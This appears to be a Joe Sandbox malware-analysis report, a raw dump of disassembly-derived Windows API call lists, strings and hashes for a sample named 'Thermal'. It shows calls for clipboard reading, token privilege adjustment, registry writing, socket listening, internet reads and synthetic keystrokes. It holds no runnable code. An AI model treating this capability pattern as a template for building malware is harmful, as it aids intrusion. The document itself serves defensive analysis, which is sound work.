                                                      • GetKeyState.USER32(00000009), ref: 001AD387
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001AD39D
                                                      • GetKeyState.USER32(00000010), ref: 001AD3A7
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001AD3D0
                                                      • SendMessageW.USER32 ref: 001AD3F7
                                                      • SendMessageW.USER32(?,00001030,?,001AB9BA), ref: 001AD4FD
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 001AD513
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 001AD526
                                                      • SetCapture.USER32(?), ref: 001AD52F
                                                      • ClientToScreen.USER32(?,?), ref: 001AD594
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001AD5A1
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001AD5BB
                                                      • ReleaseCapture.USER32 ref: 001AD5C6
                                                      • GetCursorPos.USER32(?), ref: 001AD600
                                                      • ScreenToClient.USER32(?,?), ref: 001AD60D
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 001AD669
                                                      • SendMessageW.USER32 ref: 001AD697
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 001AD6D4
                                                      • SendMessageW.USER32 ref: 001AD703
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001AD724
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 001AD733
                                                      • GetCursorPos.USER32(?), ref: 001AD753
                                                      • ScreenToClient.USER32(?,?), ref: 001AD760
                                                      • GetParent.USER32(?), ref: 001AD780
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 001AD7E9
                                                      • SendMessageW.USER32 ref: 001AD81A
                                                      • ClientToScreen.USER32(?,?), ref: 001AD878
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001AD8A8
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 001AD8D2
                                                      • SendMessageW.USER32 ref: 001AD8F5
                                                      • ClientToScreen.USER32(?,?), ref: 001AD947
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001AD97B
                                                        • Part of subcall function 001229AB: GetWindowLongW.USER32(?,000000EB), ref: 001229BC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001ADA17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3977979337-4164748364
                                                      • Opcode ID: f1b70eb563eb43876586d81a3660bcbc3231d13f98bd73f98c0c24995e16249f
                                                      • Instruction ID: 0e158db0d35d7dd5676ba8c720c296d276e22434a07191d6bddd8b52dffcd4c2
                                                      • Opcode Fuzzy Hash: f1b70eb563eb43876586d81a3660bcbc3231d13f98bd73f98c0c24995e16249f
                                                      • Instruction Fuzzy Hash: 1442F178204740AFDB25CF28D844FAABBE5FF5E310F14065AF65687AA0C771D894CB91
                                                      APIs
                                                        • Part of subcall function 00179399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001793E3
                                                        • Part of subcall function 00179399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00179410
                                                        • Part of subcall function 00179399: GetLastError.KERNEL32 ref: 0017941D
                                                      • _memset.LIBCMT ref: 00178F71
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00178FC3
                                                      • CloseHandle.KERNEL32(?), ref: 00178FD4
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00178FEB
                                                      • GetProcessWindowStation.USER32 ref: 00179004
                                                      • SetProcessWindowStation.USER32(00000000), ref: 0017900E
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00179028
                                                        • Part of subcall function 00178DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00178F27), ref: 00178DFE
                                                        • Part of subcall function 00178DE9: CloseHandle.KERNEL32(?,?,00178F27), ref: 00178E10
                                                      Strings
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: 6fec3001629ba134e999711d4c2f43b6db5646a629d3fb94b16ceb8f0055cdba
                                                      • Instruction ID: e98eadd76e6ce49fc8d465a5e2a84b4ef35a7ca1576dc1e0b64a09e86a5d705e
                                                      • Opcode Fuzzy Hash: 6fec3001629ba134e999711d4c2f43b6db5646a629d3fb94b16ceb8f0055cdba
                                                      • Instruction Fuzzy Hash: 8E818F71800209BFDF11DFA4CC49AEEBB79FF08314F548159F918A6260DB328E69DB60
                                                      APIs
                                                      • OpenClipboard.USER32(001B0980), ref: 0019465C
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0019466A
                                                      • GetClipboardData.USER32(0000000D), ref: 00194672
                                                      • CloseClipboard.USER32 ref: 0019467E
                                                      • GlobalLock.KERNEL32(00000000), ref: 0019469A
                                                      • CloseClipboard.USER32 ref: 001946A4
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 001946B9
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 001946C6
                                                      • GetClipboardData.USER32(00000001), ref: 001946CE
                                                      • GlobalLock.KERNEL32(00000000), ref: 001946DB
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0019470F
                                                      • CloseClipboard.USER32 ref: 0019481F
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                      • String ID:
                                                      • API String ID: 3222323430-0
                                                      • Opcode ID: 21472101f9264db794ee4d77d75c46f8121c9c12ba7e678b7d0713d4b5f45299
                                                      • Instruction ID: 8b66b91ac276f7c6cd6cf7be063a5723188f8e922f30d80d21181a73799ce7ab
                                                      • Opcode Fuzzy Hash: 21472101f9264db794ee4d77d75c46f8121c9c12ba7e678b7d0713d4b5f45299
                                                      • Instruction Fuzzy Hash: 1E51DF71204305AFDB11EF64EC89F6F77A8AF98B50F004629F646D21E1EF30D9468B62
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0018CDD0
                                                      • FindClose.KERNEL32(00000000), ref: 0018CE24
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0018CE49
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0018CE60
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0018CE87
                                                      • __swprintf.LIBCMT ref: 0018CED3
                                                      • __swprintf.LIBCMT ref: 0018CF16
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • __swprintf.LIBCMT ref: 0018CF6A
                                                        • Part of subcall function 001438C8: __woutput_l.LIBCMT ref: 00143921
                                                      • __swprintf.LIBCMT ref: 0018CFB8
                                                        • Part of subcall function 001438C8: __flsbuf.LIBCMT ref: 00143943
                                                        • Part of subcall function 001438C8: __flsbuf.LIBCMT ref: 0014395B
                                                      • __swprintf.LIBCMT ref: 0018D007
                                                      • __swprintf.LIBCMT ref: 0018D056
                                                      • __swprintf.LIBCMT ref: 0018D0A5
                                                      Strings
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 3953360268-2428617273
                                                      • Opcode ID: 068d9106d328e25327a8f5db30195d0f7b242abc7965a37bfe6bd9341a06293a
                                                      • Instruction ID: 5cb1f4f5a2314ca4511a26be8562e67c712cf9cd0fc84d18c0766e2c6f64c028
                                                      • Opcode Fuzzy Hash: 068d9106d328e25327a8f5db30195d0f7b242abc7965a37bfe6bd9341a06293a
                                                      • Instruction Fuzzy Hash: 3AA14BB1408315ABD714EFA4D985DAFB7ECFFA4704F400919F595C2191EB30EA08CBA2
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0018F5F9
                                                      • _wcscmp.LIBCMT ref: 0018F60E
                                                      • _wcscmp.LIBCMT ref: 0018F625
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0018F637
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0018F651
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0018F669
                                                      • FindClose.KERNEL32(00000000), ref: 0018F674
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0018F690
                                                      • _wcscmp.LIBCMT ref: 0018F6B7
                                                      • _wcscmp.LIBCMT ref: 0018F6CE
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0018F6E0
                                                      • SetCurrentDirectoryW.KERNEL32(001DB578), ref: 0018F6FE
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0018F708
                                                      • FindClose.KERNEL32(00000000), ref: 0018F715
                                                      • FindClose.KERNEL32(00000000), ref: 0018F727
                                                      Strings
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: 358b0e193ca1722062136fac0e8970cadcc76c563e698cf91ff12cbe8a526dab
                                                      • Instruction ID: eab244c8fb64161278798ab2b8da890e47beca43e1ff1d61c272120e85ec1de5
                                                      • Opcode Fuzzy Hash: 358b0e193ca1722062136fac0e8970cadcc76c563e698cf91ff12cbe8a526dab
                                                      • Instruction Fuzzy Hash: FF31B571641219AADF15EBB4EC49ADF77ACAF4D321F1002A9F855D21A0EB30DB85CF60
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001A0FB3
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,001B0980,00000000,?,00000000,?,?), ref: 001A1021
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001A1069
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 001A10F2
                                                      • RegCloseKey.ADVAPI32(?), ref: 001A1412
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 001A141F
                                                      Strings
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: 2f24d9d0bc3a5a19940dfd3d0d3586425a0fedaf4a3f542fb8ab8f2f9e1d3d4f
                                                      • Instruction ID: 7a38b93c4065338d33c5196a1820bd71662e713b42cb77dea62acf3f2c2ae35c
                                                      • Opcode Fuzzy Hash: 2f24d9d0bc3a5a19940dfd3d0d3586425a0fedaf4a3f542fb8ab8f2f9e1d3d4f
                                                      • Instruction Fuzzy Hash: 77028B75200611AFCB15EF65C841E2AB7E5FF99720F04895DF89A9B3A2CB34EC41CB91
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0018F756
                                                      • _wcscmp.LIBCMT ref: 0018F76B
                                                      • _wcscmp.LIBCMT ref: 0018F782
                                                        • Part of subcall function 00184875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00184890
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0018F7B1
                                                      • FindClose.KERNEL32(00000000), ref: 0018F7BC
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0018F7D8
                                                      • _wcscmp.LIBCMT ref: 0018F7FF
                                                      • _wcscmp.LIBCMT ref: 0018F816
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0018F828
                                                      • SetCurrentDirectoryW.KERNEL32(001DB578), ref: 0018F846
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0018F850
                                                      • FindClose.KERNEL32(00000000), ref: 0018F85D
                                                      • FindClose.KERNEL32(00000000), ref: 0018F86F
                                                      Strings
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: 87a37fb8aef256d7366e44b6ee0ab080b5fb911bb6c72edd2a816c476b47d495
                                                      • Instruction ID: da3a1c6453c4b2296bf03643e2628b63748be750a4b7f19ba104acb01046bf6e
                                                      • Opcode Fuzzy Hash: 87a37fb8aef256d7366e44b6ee0ab080b5fb911bb6c72edd2a816c476b47d495
                                                      • Instruction Fuzzy Hash: 1C319871540219AAEF15EBB5DC89ADF776C9F1E321F1001A9F854A21A0DB30DF468F50
                                                      APIs
                                                        • Part of subcall function 00178E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00178E3C
                                                        • Part of subcall function 00178E20: GetLastError.KERNEL32(?,00178900,?,?,?), ref: 00178E46
                                                        • Part of subcall function 00178E20: GetProcessHeap.KERNEL32(00000008,?,?,00178900,?,?,?), ref: 00178E55
                                                        • Part of subcall function 00178E20: HeapAlloc.KERNEL32(00000000,?,00178900,?,?,?), ref: 00178E5C
                                                        • Part of subcall function 00178E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00178E73
                                                        • Part of subcall function 00178EBD: GetProcessHeap.KERNEL32(00000008,00178916,00000000,00000000,?,00178916,?), ref: 00178EC9
                                                        • Part of subcall function 00178EBD: HeapAlloc.KERNEL32(00000000,?,00178916,?), ref: 00178ED0
                                                        • Part of subcall function 00178EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00178916,?), ref: 00178EE1
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00178931
                                                      • _memset.LIBCMT ref: 00178946
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00178965
                                                      • GetLengthSid.ADVAPI32(?), ref: 00178976
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 001789B3
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001789CF
                                                      • GetLengthSid.ADVAPI32(?), ref: 001789EC
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001789FB
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00178A02
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00178A23
                                                      • CopySid.ADVAPI32(00000000), ref: 00178A2A
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00178A5B
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00178A81
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00178A95
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      APIs
                                                        • Part of subcall function 001A147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001A040D,?,?), ref: 001A1491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001A0B0C
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001A0BAB
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001A0C43
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 001A0E82
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 001A0E8F
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      APIs
                                                      • __swprintf.LIBCMT ref: 00184451
                                                      • __swprintf.LIBCMT ref: 0018445E
                                                        • Part of subcall function 001438C8: __woutput_l.LIBCMT ref: 00143921
                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00184488
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00184494
                                                      • LockResource.KERNEL32(00000000), ref: 001844A1
                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 001844C1
                                                      • LoadResource.KERNEL32(?,00000000), ref: 001844D3
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 001844E2
                                                      • LockResource.KERNEL32(?), ref: 001844EE
                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0018454F
                                                      Similarity
                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                      • String ID:
                                                      • API String ID: 1433390588-0
                                                      APIs
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0018FA83
                                                      • FindClose.KERNEL32(00000000), ref: 0018FB96
                                                        • Part of subcall function 001252B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001252E6
                                                      • Sleep.KERNEL32(0000000A), ref: 0018FAB3
                                                      • _wcscmp.LIBCMT ref: 0018FAC7
                                                      • _wcscmp.LIBCMT ref: 0018FAE2
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0018FB80
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                      • String ID: *.*
                                                      • API String ID: 2185952417-438819550
                                                      APIs
                                                        • Part of subcall function 00179399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001793E3
                                                        • Part of subcall function 00179399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00179410
                                                        • Part of subcall function 00179399: GetLastError.KERNEL32 ref: 0017941D
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 001857B4
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-194228
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001969C7
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 001969D6
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 001969F2
                                                      • listen.WSOCK32(00000000,00000005), ref: 00196A01
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00196A1B
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00196A2F
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                      • String ID:
                                                      • API String ID: 1279440585-0
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00121DD6
                                                      • GetSysColor.USER32(0000000F), ref: 00121E2A
                                                      • SetBkColor.GDI32(?,00000000), ref: 00121E3D
                                                        • Part of subcall function 0012166C: DefDlgProcW.USER32(?,00000020,?), ref: 001216B4
                                                      Similarity
                                                      • API ID: ColorProc$LongWindow
                                                      • String ID:
                                                      • API String ID: 3744519093-0
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0018C329
                                                      • _wcscmp.LIBCMT ref: 0018C359
                                                      • _wcscmp.LIBCMT ref: 0018C36E
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0018C37F
                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0018C3AF
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 2387731787-0
                                                      APIs
                                                        • Part of subcall function 00198475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001984A0
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00196E89
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00196EB2
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00196EEB
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00196EF8
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00196F0C
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 99427753-0
                                                      APIs
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      APIs
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00191ED6,00000000), ref: 00192AAD
                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00192AE4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                      • String ID:
                                                      • API String ID: 599397726-0
                                                      • Opcode ID: cbae0bb4e63326d55861c6a160df74bef2b7c3d6407d10634ecaff083d59242f
                                                      • Instruction ID: 3774101ef844b8852bf8d0505efd18100adaeb2974793873e7e2853df9154e7b
                                                      • Opcode Fuzzy Hash: cbae0bb4e63326d55861c6a160df74bef2b7c3d6407d10634ecaff083d59242f
                                                      • Instruction Fuzzy Hash: 3541D572A00209BFEF20DE95CC85EBBB7FCEB40764F10405AF605A7551EB719E819660
                                                      APIs
                                                        • Part of subcall function 00140FE6: std::exception::exception.LIBCMT ref: 0014101C
                                                        • Part of subcall function 00140FE6: __CxxThrowException@8.LIBCMT ref: 00141031
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001793E3
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00179410
                                                      • GetLastError.KERNEL32 ref: 0017941D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      • Opcode ID: 838c2f76316ad04b499c6a91c28444d04d48e04ef5d880b06bf7762232750028
                                                      • Instruction ID: b8544a41e2a376913a62f174d217123c7ed39f49e64c9beac077364a10fee6f4
                                                      • Opcode Fuzzy Hash: 838c2f76316ad04b499c6a91c28444d04d48e04ef5d880b06bf7762232750028
                                                      • Instruction Fuzzy Hash: 15116DB1414205AFD728EF64DCC5D2BB7B8FB48750B20852EF45A92650EB70AC45CA60
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00184271
                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001842B2
                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001842BD
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: 48f7f13fea1b4b64ace72c1fed66c250e14ce2bedd3fdbf8f7a2aa95032a36b9
                                                      • Instruction ID: 6d16b677da4ffe80e3cee08fb5de6550aa07019f3e642987925b3d1989b48a47
                                                      • Opcode Fuzzy Hash: 48f7f13fea1b4b64ace72c1fed66c250e14ce2bedd3fdbf8f7a2aa95032a36b9
                                                      • Instruction Fuzzy Hash: 3A118271E05228BFDB108F95AC44BAFBBBCEB49B60F104255FD04E7290C7704A008BA1
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00184F45
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00184F5C
                                                      • FreeSid.ADVAPI32(?), ref: 00184F6C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: 6be5dc058c0f88dac50d25b3a705f02574d4ed9e3d1f037fcabb6f27222625bc
                                                      • Instruction ID: 0a4073fe7e40e78dc4c886ff0683af54014d8e5ba4a83c9629d52a2264ea4f47
                                                      • Opcode Fuzzy Hash: 6be5dc058c0f88dac50d25b3a705f02574d4ed9e3d1f037fcabb6f27222625bc
                                                      • Instruction Fuzzy Hash: 6BF04975A1130DBFDF00EFE4DC89AAEBBBCEF08201F1045A9BA01E2580E7356A448B50
                                                      APIs
                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00181B01
                                                      • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00181B14
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: InputSendkeybd_event
